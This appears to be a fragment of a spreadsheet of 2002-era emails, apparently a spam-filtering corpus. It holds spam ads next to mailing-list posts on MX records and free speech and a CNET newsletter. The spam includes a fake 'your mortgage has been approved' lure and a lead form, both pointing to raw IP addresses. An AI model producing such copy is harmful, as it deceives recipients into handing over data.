 today!&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;Please fill out the =
 form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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value=3D"brianb@americanfinancialmktg.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"InsuranceIQ Potential Advertiser"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"7"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/amf/logo.gif" width=3D"252" =
 height=3D"111"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;We=20
               don't want anybody to receive our mailing who does not =
 wish to receive=20
               them. This is a professional communication sent to =
 insurance professionals.=20
               To be removed from this mailing list, DO NOT REPLY to this =
 message.=20
               Instead, go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
               &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1DD90E_01C200E4.C0E7B7B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --Fnm8lRGFTVS/3GuM
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Sep 13, 2002 at 01:33:43PM -0500, vernon wrote:
 &gt; As I understand it, DNS A records are used in a rotating fashion for load
 &gt; balancing, but DNS MX records are used in order or prority, meaning the 10
 &gt; before the 20 and only 20 if the 10 isn't available.
 That's the theory, yes.
 &gt; But only some of the mail is actually being scanned which leads me to
 &gt; believe that not all of the mail is actually hitting that box and the 10
 &gt; never goes down. Why? Have I got something confused here?
 No, but either due to some technical glitch, or downright just wanting
 to do so, people send to the secondary.  It's a semi-usual spammer trick
 actually to bypass the main server and send directly to a secondary
 since it will either have less filtering, or be "trusted", or ...
 MX records in the mail world are all explained in RFC 2821, section 5:
 [...]
    Multiple MX records contain a preference indication that MUST be used
    in sorting (see below).  Lower numbers are more preferred than higher
    ones.  If there are multiple destinations with the same preference
    and there is no clear reason to favor one (e.g., by recognition of an
    easily-reached address), then the sender-SMTP MUST randomize them to
    spread the load across multiple mail exchangers for a specific
    organization.
 [...]
    If it determines that it should relay the message without rewriting
    the address, it MUST sort the MX records to determine candidates for
    delivery.  The records are first ordered by preference, with the
    lowest-numbered records being most preferred.  The relay host MUST
    then inspect the list for any of the names or addresses by which it
    might be known in mail transactions.  If a matching record is found,
    all records at that preference level and higher-numbered ones MUST be
    discarded from consideration.  If there are no records left at that
    point, it is an error condition, and the message MUST be returned as
    undeliverable.  If records do remain, they SHOULD be tried, best
    preference first, as described above.
 --=20
 Randomly Generated Tagline:
 "Now let's say I like sheep...  And now let's say I take the sheep to a=20
  Christmas party..."               - Bob Golub
 --Fnm8lRGFTVS/3GuM
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9gjX9AuOQUeWAs2MRAg7PAJ42kO68knZx76oQbrZPMGdg/JbJHACfQvlX
 O/Utl8FY01aS+/e3VNE9WWM=
 =O6kU
 -----END PGP SIGNATURE-----
 --Fnm8lRGFTVS/3GuM--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</si>
  <si>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&gt; "Around the world, there is a growing sense that democracy has not
 &gt; delivered development" Sakiko Fukuda-Parr UN report author
 As opposed to some other form of government which has?
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: POLICY CHANGE: subscriber-only posting
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry, gang, but I've flipped the switch. If your posting address 
 doesn't match your subscription address, or if you've instructed a robot 
 to forkpost on your behalf, it'll get held, silently, for me or Kragen 
 to review. Which will be rarely, so be warned.
 Let's see how this works out for a week or so...
 Rohit
 ---
 My permanent email address is khare@alumni.caltech.edu
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Aug 14, 2002 at 02:47:02PM -0700, Patrick wrote:
 &gt; Is there a point that you plan on releasing detailed information about
 &gt; TeS, so we can stop engaging in idle speculation?
 &gt;
 &gt; It's not my desire to second-guess you Vipul (however much my missives
 &gt; may appear otherwise) or question the hard work you and the other
 &gt; developers have put into the system, however it seems that every request
 &gt; for such information has been met with silence.
 There are no plans for releasing details about TeS. Before the
 release of Razor2, I'd pointed out that Razor2 backend (specially
 TeS) will be closed.
 cheers,
 vipul.
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson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</si>
  <si>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RE: Reduce Your Home Loan Payment $500 per Month, No Closing Costs nbd
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #006600; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#000000"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dear 
               Homeowner,&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;
               *&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000"&gt;6.25% 
               30 Yr Fixed Rate Mortgage&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font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
             &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=b33"&gt;Click Here for a Free Quote!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=A11"&gt;
               &lt;/a&gt;
             &lt;/div&gt;
             &lt;p&gt;&lt;b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Lock 
             In YOUR LOW FIXED RATE TODAY&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
               COST OUT OF POCKET&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;NO 
               OBLIGATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;FREE 
               CONSULTATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;ALL 
               CREDIT GRADES ACCEPTED&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana,Arial,Helvetica,sans-serif" color="red" size="2"&gt;
               &lt;b&gt;
               &lt;a href="http://66.231.133.63/index.html?ID=b33"&gt;Rates as low as 
               6.25% won't stay this low forever CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               &lt;b&gt;
             &lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;
               * based on mortgage rate as of 5-15-02 as low as 6.25% see lender 
               for details&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#FFFFFF" bordercolor="#006600"&gt;
             &lt;h1&gt;&lt;span style="vertical-align: middle"&gt;
             &lt;font face="Webdings" style="font-size: 200" color="#006600"&gt;
             &lt;a href="http://66.231.133.63/index.html?ID=b33"&gt;
             &lt;font color="#006600"&gt;H&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/h1&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="472" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Apply 
                 now and one of our lending partners will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;&lt;/td&gt;
                 &lt;/font&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.63/index.html?ID=b33"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
             &lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;To Be Removed Please &amp;quot;&lt;a href="http://66.231.133.63/final/index_remoov.html?ID=b33"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Re[2]: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
 &gt; GAB&gt; The problem is that politics have gotten so muddied
 &gt; GAB&gt; nowadays, that shouting down and unpeaceably disrupting
 &gt; GAB&gt; political rallies that you don't agree with has become
 &gt; GAB&gt; common practice.  The courts have constantly ruled
 &gt; GAB&gt; that there are some restrictions on the first amendment.
 &gt; GAB&gt; They teach you that your very first year of law school.
 &gt;
 &gt; I'll agree with Owen on this one.  Muddied my ass.  How hard is it to
 &gt; chose between a Republocrat or a Demipublican?   Not very.  Shouting
 &gt; down has grown to become the answer because the government, over a
 &gt; span of years, and with the help of the Courts -has- limited the
 &gt; rights we have as citizens under the First Amendment.
 Wishful thinking. People are just bigger dickheads now. Culture is changing
 and it is becoming acceptable to get in peoples face and shout them down
 when you disagree with them.  The people that do this are NOT
 disenfranchised. They
 get their rocks off on being disagreeable assholes. The act of protesting is
 more important than the actual issue being protested for most of these
 people.
 &gt; question the policy about terrorism, or drugs, or Iraq, or Bush in
 &gt; general, you're aiding terrorism.   If you challenge the beliefs of
 &gt; the folks attending the various shadowy G8 conferences, you're an
 &gt; anarchist, and you're herded off to a 'designated protest spot' miles
 &gt; away from anything.   Part of the point of speech is to be -heard-.
 &gt; I can scream on my soapbox in the forest somewhere, and while thats
 &gt; speech, its not effective speech.  People are screaming and shouting
 &gt; over the political figures because they cannot be  heard in any other
 &gt; way.
 And where does this end? Shouting down speakers is an obviously stupid
 tactic if they are -really- interested in advocating change. Are they such
 clueless social morons that they don't see this or are they just interested
 in stroking their pathetic egos?
 OBTW, 'clueless social moron syndrom' does not have political boundaries.
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Movable Type 2.5 is out
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#movable_type_25_is_out
 Date: 2002-10-08T20:52:08-05:00
 Movable Type 2.5 is out. I'm running it and it appears to work. It incorporates 
 many suggestions from Dive Into Accessibility[1], a book which was written in 
 and is still powered by Movable Type. I find this amusing in a self-referential 
 sort of way. 
 The other big change is the inclusion of MT-search to allow users to have their 
 own site search. Every web site needs a site search[2]. Existing MT-search 
 users should merge the contents of mt-search.cfg into mt.cfg, change 
 "TemplateDir" to "SearchTemplatePath", and (if you use alternate templates) 
 change "AltTemplate1", "AltTemplate2", "AltTemplate3", etc. to "AltTemplate". 
 They should all just be "AltTemplate". 
 - Download MT 2.5[3]. 
 - MT 2.5 changelog[4]. 
 [1] http://diveintoaccessibility.org/
 [2] http://diveintoaccessibility.org/day_29_making_everything_searchable.html
 [3] http://www.movabletype.org/25/
 [4] http://www.movabletype.org/docs/mtchanges.html#2.5 (2002.10.08)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; On Thu, 19 Sep 2002, Bill Stoddard wrote:
 &gt; --]How likely are you to change someone's mind by being
 &gt; --]rude and disrespectful to them? Is this how to win friends and
 &gt; influence
 &gt; --]people?
 &gt;
 &gt; Point the first, I doubt if they are trying to change Rumsy's mind but
 &gt; rather to show others that there is a vocal and violent opposition to his
 &gt; views. With such flagrant showings of opposition there would be more
 &gt; coverage of the opposing ideas and thus the spreading of the dissenting
 &gt; meme. A viri need not comply with the wishes of the attacked host, rather
 &gt; the host had better make some antibodies or learn to adapt.
 &gt;
 &gt; Point the second. Historicaly the "in yer face" mode of confrontation has
 &gt; been used to gain popular support and to grow from seeds "grass roots"
 &gt; movements. Witness the big bold "in yer face" signature of Hancock on the
 &gt; "in yer  face" Declaration of the american colonies to the governing
 &gt; powers of england. Witness also the chicago seven, Others will follow in
 &gt; examplare  form upon digging.
 &gt;
 &gt; Now point the third, is it annoying? Yes, and if your annoyed then the "in
 &gt; yer facers" have done thier job. Sad to say the polite persnikiters are
 &gt; teh very fule the "in yer facers" hope to ignite. If your burning, your
 &gt; being used.
 &gt;
 &gt; Pointed the personal...The politics of the polite are more often the
 &gt; refuge of backstabings,  closed mouth recourlessness and hypocritcal
 &gt; behavoirs. Id rather hear what those who oppose me have to say than
 &gt; quietly be knifed by the slow hand of the coward.
 &gt;
 &gt;
 &gt;
 &gt; Seek not the polite or impolite but rather the reasons why.
 &gt;
 &gt;
 &gt; -tom
 Good points all but they don't apply in this case.  Someone is speaking and
 a group of selfish bastards only interested in getting their rocks off are
 trying to shout him down (they are doing it because 'it's good for the
 soul'. Kind like Chuckie Manson doing the stuff he did cause 'it was good
 for his soul'). Unprincipled and evil. It's got nothing to do with throwing
 tea in the harbor or the DoI.
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: .* Mortgage Approved*
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;Congratulations! Your mortgage&lt;BR&gt;
 &lt;BR&gt;
 has been approved. &lt;BR&gt;
 &lt;BR&gt;
 &lt;A HREF=3D"http://211.91.20.163/host/site1/"&gt;Click Here&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 To be removed &lt;A HREF=3D"http://211.91.20.163/host/remove/"&gt;Click here&lt;/A&gt;=
 &lt;/FONT&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Selling secure laptops no open-shut case&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hTVXnYGLN8S_eSgFWVRR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=75-whwtIKU3zF828oK_rjups7LLZ5ZR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnM4BjvJjoO3Nt-tKChBwnR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JMEHnT86DYlcGhVIlcU_eR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z2HGlHfx8qJzDxDXozLCyR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgDZBks4fSjg0SxiPZvH6lR"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18, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Selling secure laptops no open-shut case&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Apple's harvest: New iPods, bigger iMac and more&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft unbundles directory technology&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Pittman set to leave AOL Time Warner&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tech activists protest anti-copying&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Earnings alert: Handspring trims loss&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Perspectives&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;The options party is over&lt;/b&gt;&lt;br&gt;
 Kenneth Broad says it's easy to see why the tech industry is fighting to keep options from being expensed.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETx2aGE9BfbQq-Kh1XhaeR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Selling secure laptops no open-shut case&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Rop Gonggrijp admits that it's not a promising time to start an Internet privacy company.
 The founder of NAH6 knows all about flops such as Privada, abandoned software such as PGP and SafeWeb, and struggling firms such as Zero Knowledge.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDS-WAlK1uUJ5QddfWmTyR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Apple's harvest: New iPods, bigger iMac and more&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 As the Mac faithful gather in New York, Apple CEO Steve Jobs rallies to the defense of the Mac OS X operating system and trots out new hardware, including a bigger iMac and iPods for Windows. But the company heads into murky waters with its .Mac Web services plan.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 10:50 a.m. PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj8jskisYs-LYSS7ZMgtY8lR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Microsoft unbundles directory technology&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft will begin selling its directory technology as a standalone product separate from the Windows operating system.
 Microsoft will continue to build in its "Active Directory" as part of Windows, but will give its customers the new option of buying the technology as a separate product next year, Microsoft executives said this week. The directory technology essentially provides a network manager with a central database to store and manage information about users, computer systems and networking devices. Microsoft competes against Novell and Sun Microsystems in the directory-server software market.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 11:30 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPx93qRtRqEsB8LE27qd4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Pittman set to leave AOL Time Warner&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 AOL Time Warner is expected to announce after the stock markets close Thursday that embattled chief operating officer Robert Pittman will relinquish his role as the media behemoth's No. 2 executive, according to a source close to the company.
 Pittman, who also serves as the interim chief exective of the company's America Online unit, could remain at the online division until a permanent CEO is found. But the timetable for Pittman's departure will be based on his own decision, the source added. AOL Time Warner last week confirmed that it hired executive search firm Spencer Stuart to head AOL's CEO search.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 12:05 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjcJozsgUkz6yClxb-7XsrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Tech activists protest anti-copying&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Enthusiasts of free software disrupted a Commerce Department meeting Wednesday, insisting on their right to debate the entertainment industry over anti-copying technologies.
 About a dozen vocal tech activists in the audience challenged speakers, including Jack Valenti, head of the Motion Picture Association of America (MPAA), who equated piracy with theft and applauded digital rights management.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 5:55 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVsXND3UXl_kj2ZBSJuRR" &gt;
